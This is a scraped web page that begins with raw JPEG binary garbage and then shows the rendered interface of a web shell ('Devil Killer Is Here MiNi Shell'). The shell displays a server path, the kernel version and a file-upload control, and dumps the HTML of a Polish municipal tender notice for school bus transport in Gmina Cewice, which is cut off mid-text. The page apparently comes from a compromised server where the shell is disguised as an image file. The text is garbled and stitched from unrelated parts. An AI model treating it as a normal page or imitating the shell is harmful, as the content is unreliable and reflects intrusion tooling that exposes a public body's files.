JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220809/0029900401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Cewice w roku szkolnym 2022/2023 w okresie od 1 września 2022 r. do 30 czerwca 2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Cewice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">W. Witosa 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Cewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 861-34-60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 861-34-62</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cewice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cewice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> kierowanie podstawowymi rodzajami działalności publicznej </p> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stowarzyszenie Rozwój Sołectwa Popowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">220601485</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Popowo 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Popowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-311</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">889-588-091</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">stowarzyszenie.popowo@gmail.com</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.nsppopowo.cewice.pl</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Zamawiający zawarli porozumienie, z którego wynika podział obowiązków w postępowaniu. Gmina Cewice odpowiedzialna jest za przygotowanie i<br/>przeprowadzenie postępowania do wyboru oferty najkorzystniejszej, zaś Stowarzyszenie Popowo podaje dane niezbędne do opisania przedmiotu<br/>zamówienia. Umowy w sprawie zamówienia publicznego podpisywane są oddzielnie przez Zamawiających w zakresie, w jakim każdy z nich określił<br/>zakres przedmiotu zamówienia. Każdy z Zamawiających będzie monitorował realizację umowy na dowóz dzieci i młodzieży do placówek oświatowych<br/>będących w jego władaniu. Ogłoszenia o wyniku postępowania udziela każdy z Zamawiających oddzielnie</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Cewice w roku szkolnym 2022/2023 w okresie od 1 września 2022 r. do 30 czerwca 2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-619b4a62-17e5-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00299004</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025828/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Cewice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://cewice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://cewice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korespondencja prowadzona jest za<br/>pomocą Platformy Zakupowej dostępnej pod adresem wskazanym poniżej. 4.1. zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie Gminy Cewice;https://cewice.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl.4.2.Wykonawca po wybraniu opcji„Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;podaje adres e-mail, ustanawia hasło,następnie powtarza<br/>hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.4.3. Rejestracja Wykonawcy<br/>trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na<br/>rejestrację w procesie złożenia Oferty.Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o<br/>możliwości przyspieszenia<br/>procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 4.4. Po<br/>założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami,<br/>w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki„Korespondencja”.5. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści<br/>SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję„Zadaj pytanie” lub przy użyciu zakładki<br/>„Korespondencja”. Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z<br/>dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gminy Cewice tel. +48 22 257 22 23 (infolinia dostępna w dni<br/>robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl8. Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>8.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>8.2. Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>8.3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>8.4. Włączona obsługa JavaScript;<br/>8.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>10. Zamawiający określa informacje na temat kodowania i czasu odbioru danych<br/>tj.:10.1. Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany –<br/>format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia 2016/679, w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX Pzp, do upływu terminu na ich wniesienie.2. Skorzystanie przez osobę, której dane osobowedotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w<br/>art.16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą.3. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1<br/>rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.4. W przypadku gdy wniesienie żądania<br/>dotyczącego prawa, o którym mowa w art. 18ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole<br/>postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679. 5. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp,<br/>stosuje się odpowiednio. 6. W przypadku korzystania przez osobę,której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w<br/>art. 15ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia. 7. Skorzystanie przez osobę, której dane osobowe są Przetwarzane, z<br/>uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa wart. 16 rozporządzenia 2016/679, nie może naruszać integralności,protokołu postępowania oraz jego załączników.8. W<br/>postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych<br/>(Dz.U.z2019 r. poz. 1781)oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności samego wykonawcy (osoby fizycznej prowadzącej działalność<br/>gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania<br/>warunków udziału w postępowaniu, braku podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania<br/>przedmiotu zamówienia.9. W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób fizycznychsmmtosuje się przepisy ustawy z<br/>dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679.10. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>2016/679, zamawiający informuje, że: 1) administratorem danych osobowych osób fizycznych jest Zamawiający -Gmina Cewice ul. W. Witosa 16, 84-312 Cewice,<br/>tel.: 59 861-34-60; fax:59 861-34-62, email: sekretariat@cewice.pl, 2) Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować Pani<br/>Monika Zygmunt-Jakuć, kontakt: iod@cewice.pl, tel.:<br/>791-711- 174,3) dane osobowe osób fizycznych przetwarzane będą na podstawie art. 6 ust. 1 lit. c rozporządzenia 2016/679 w celu związanym z postępowaniem<br/>o udzielenie zamówienia publicznego pn. Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Cewice w roku szkolnym 2022/2023 w okresie od 1<br/>września 2022 r. do 30 czerwca 2023r. Oznaczenie sprawy: ZP-SGS.271.19.2022. prowadzonym przez Zamawiającego – Gminę Cewice,4) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 rozporządzenia2016/679</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Skorzystanie przez osobę, której dane osobowe dotyczą,z uprawnienia do<br/>sprostowania lub uzupełnienia, o którym mowa w art. 16 Rozporządzenia2016/679,nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. 2.Zgłoszenie żądania ograniczenia<br/>przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.3.W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679,spowoduje ograniczenie<br/>przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie<br/>zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.26.2022.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 224000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia<br/>1) Przedmiotem zamówienia jest świadczenie usług transportowych w zakresie kompleksowego dowozu dzieci i młodzieży do placówek oświatowych na<br/>terenie Gminy Cewice w roku szkolnym 2022/2023 tj. od 1 września 2022r. do 30 czerwca 2023r.<br/>2) Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym z Zamawiającym.<br/>3) Usługa stanowiąca przedmiot zamówienia ma być realizowana w szkołach: Zespole Szkół w Cewicach, Szkole Podstawowej w Łebuni, Szkole<br/>Podstawowej im. Polskich Olimpijczyków w Maszewie Lęborskim, Szkole Podstawowej z Oddziałami Integracyjnymi im. Leśników Polskich w Przerytem,<br/>Niepublicznym Zespole Szkolno-Przedszkolnym w Popowie.<br/>4) Przewozy obejmują wyjazd ze wskazanego przez Zamawiającego miejsca, przybycie do wyznaczonej szkoły w odpowiednim czasie przed<br/>rozpoczęciem zajęć lekcyjnych, oraz odwiezienie uczniów po zajęciach do miejscowości, w których mieszkają lub,<br/>z których dojeżdżają do szkół, zgodnie z posiadanym biletem. Wyszczególnienie tras i miejscowości, liczby dzieci, godzin dowozu do i odwozu ze szkół<br/>przedstawia Tabela dowóz dzieci 2022-2023.<br/>5) Wykonawca świadczyć będzie usługi sprawnymi technicznie autobusami, oznakowanymi odpowiednimi tablicami świadczącymi o przewozie uczniów,<br/>które spełniają wszelkie wymogi do przewozu dzieci, w szczególności określone<br/>w Rozporządzeniu Ministra Infrastruktury w sprawie warunków technicznych pojazdów oraz ich wyposażenia.<br/>6) W okresie zimy oraz w chłodne dni wiosny i jesieni autobusy dowożące dzieci muszą być ogrzewane.<br/>7) Codzienny dowóz i odwóz uczniów powinien być realizowany przez co najmniej<br/>4 autobusy. Wykonawca zapewni min. 4 kierowców posiadających stosowne uprawnienia tj. ważne prawo jazdy kat. D oraz ważne świadectwa<br/>kwalifikacji.<br/>8) Wykonawca zapewni miejsca siedzące oraz odpowiednie warunki przewożonym dzieciom zgodnie z obowiązującym prawem w zakresie transportu<br/>drogowego przewożonych osób.<br/>9) Zamawiający dopuszcza możliwość zmiany liczby dowożonych dzieci. Jednakże zmiana ta nie powinna przekroczyć 20% ogólnej liczby dowożonych<br/>uczniów, Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie. W przypadku zmiany liczby dzieci powyżej 20% zostanie zawarty<br/>stosowny aneks do umowy. Z tytułu zmniejszenia liczby dowożonych uczniów Zamawiający nie przewiduje ponoszenia dodatkowych opłat.11) Dowóz uczniów do szkół nie może zaczynać się w miejscowości początkowej na danej trasie (pierwsza miejscowość trasy) wcześniej niż o godz.<br/>7.00.<br/>10) W wyjątkowo uzasadnionych okolicznościach ewentualne zmiany godziny dowozu<br/>i odwozu można wprowadzić wyłącznie za zgodą Zamawiającego, w porozumieniu<br/>z dyrektorem danej szkoły. Tolerancja przywozu uczniów do szkół nie powinna przekroczyć 30 minut.<br/>11) Wykonawca nie może wozić uczniów z przesiadkami bez względu na długość trasy oraz dłużej niż 30 minut na trasie, która liczy do 10 km i nie<br/>dłużej niż 40 minut na trasie liczącej powyżej 10 km. Zamawiający dopuszcza odstępstwa od tej zasady tylko w przypadku złych warunków<br/>atmosferycznych, wypadku lub innych losowych zdarzeń uniemożliwiających punktualny przewóz dzieci.<br/>12) Opiekunów dowozu zapewni Zamawiający. Wykonawca powinien zapewnić im bezpłatny przejazd na danej trasie. Miejsce wsiadania/wysiadania<br/>opiekunów dowozu wskaże Zamawiający.<br/>13) Wykonawca zobowiązany jest do zatrzymywania się i zabierania dzieci (lub wysadzania) w miejscach do tego wyznaczonych, jak również w<br/>miejscach uzgodnionych z Zamawiającym.<br/>14) Zamawiającemu przysługuje prawo kontroli stanu technicznego pojazdu i warunków wykonania przedmiotu umowy.<br/>15) Przewozy będą się odbywały na podstawie harmonogramu przewozów sporządzonego w uzgodnieniu z dyrektorami szkół, z dostosowaniem do<br/>obowiązujących planów lekcji w poszczególnych szkołach. Wykonawca w uzgodnieniu z dyrektorami szkół sporządzi harmonogram przewozów<br/>określający:<br/>a) trasy przejazdu poszczególnych autobusów,<br/>b) godziny przyjazdu i wyjazdu z poszczególnych miejscowości,<br/>c) miejsca przystanków w poszczególnych miejscowościach, który przedłoży Zamawiającemu i dyrektorom szkół do zatwierdzenia.<br/>16) W uzasadnionych przypadkach Zamawiający ma prawo żądać zmian harmonogramu przewozów.<br/>17) Harmonogram przewozów podlega zmianom wynikającym z planu organizacyjnego roku szkolnego, które będą ustalane pomiędzy Wykonawcą i<br/>dyrektorami szkół.<br/>18) Zamawiający zastrzega sobie prawo w przypadku uzasadnionych okoliczności, do dostosowania tras dowozów do potrzeb dowożonych uczniów.<br/>19) W przypadku wystąpienia awarii pojazdu przewoźnik jest zobowiązany do uruchomienia zastępczego autobusu, który dowiezie uczniów do szkół lub<br/>miejsca zamieszkania, w okresie nie dłuższym niż 30 minut i niezwłocznego powiadomienia Zamawiającego o tym fakcie.<br/>20) Dojazd do miejsca rozpoczęcia przewozów i zjazd po zakończeniu dowozów do miejsca garażowania/parkowania nie podlega obciążeniu<br/>finansowemu dla Zamawiającego.<br/>21) W części przedmiotu zamówienia obejmującej usługę kompleksowego dowożenia uczniów do Niepublicznego Zespołu Szkolno-Przedszkolnego w<br/>Popowie oraz odwozu ich do miejscowości zamieszkania, umowa podpisana będzie ze Stowarzyszeniem „Rozwój Sołectwa Popowo”, które będzie<br/>także płatnikiem za zrealizowaną usługę w zakresie ujętym w Tabeli – dowóz dzieci 2022-2023.<br/>22) W przypadku zagubienia lub zniszczenia biletu miesięcznego przez ucznia do czasu wydania duplikatu biletu przez Wykonawcę, Dyrektor szkoły<br/>wydaje uczniowi zaświadczenie potwierdzające jego prawo do dowozu i odwozu na danej trasie. W takiej sytuacji Wykonawca ma obowiązek traktować<br/>zaświadczenie na równi z biletem miesięcznym.<br/>23) Każda ze szkół podpisze z wybranym Wykonawcą umowę powierzenia przetwarzania danych osobowych w zakresie danych osobowych uczniów<br/>przekazanych w związku z realizowaną umową.<br/>Informacje dotyczące przeprowadzenia wizji lokalnej w terenie<br/>Zamawiający nie wymaga przeprowadzenia wizji lokalnej w terenie ani zapoznania się z dokumentacją zamówienia w siedzibie Zamawiającego.<br/>Informacje pozostałe<br/>1. Zamawiający wymaga aby termin płatności wynosił minimum 14 dni od dnia wpłynięcia do siedziby Zamawiającego poprawnie wypełnionej faktury<br/>VAT lub innego dowodu księgowego. Jednocześnie 